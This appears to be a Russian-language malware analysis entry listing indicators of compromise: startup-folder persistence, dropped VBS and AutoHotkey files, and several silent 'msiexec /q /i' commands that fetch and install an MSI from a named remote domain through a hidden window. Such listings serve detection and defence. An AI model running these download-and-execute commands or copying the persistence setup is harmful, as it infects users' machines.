Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\autotask.lnk
- '<SYSTEM32>\wscript.exe' %ALLUSERSPROFILE%\EG.vbs
- %ALLUSERSPROFILE%\eg.vbs
- %ALLUSERSPROFILE%\xeartabas\msi.ahk
- %ALLUSERSPROFILE%\xeartabas\msi.exe
- %ALLUSERSPROFILE%\adb.exe
- %ALLUSERSPROFILE%\adb.ahk
- http://46.##.98.190/2402655936-mt1
- DNS ASK di####leverage.org
- '%ALLUSERSPROFILE%\xeartabas\msi.exe'
- '<SYSTEM32>\cmd.exe' /c msiexec /q /i https://divineleverage.org/004.msi' (со скрытым окном)
- '<SYSTEM32>\wscript.exe' %ALLUSERSPROFILE%\EG.vbs' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c msiexec /q /i https://divineleverage.org/004.msi
- '<SYSTEM32>\msiexec.exe' /q /i https://divineleverage.org/004.msi
- '%ALLUSERSPROFILE%\adb.exe'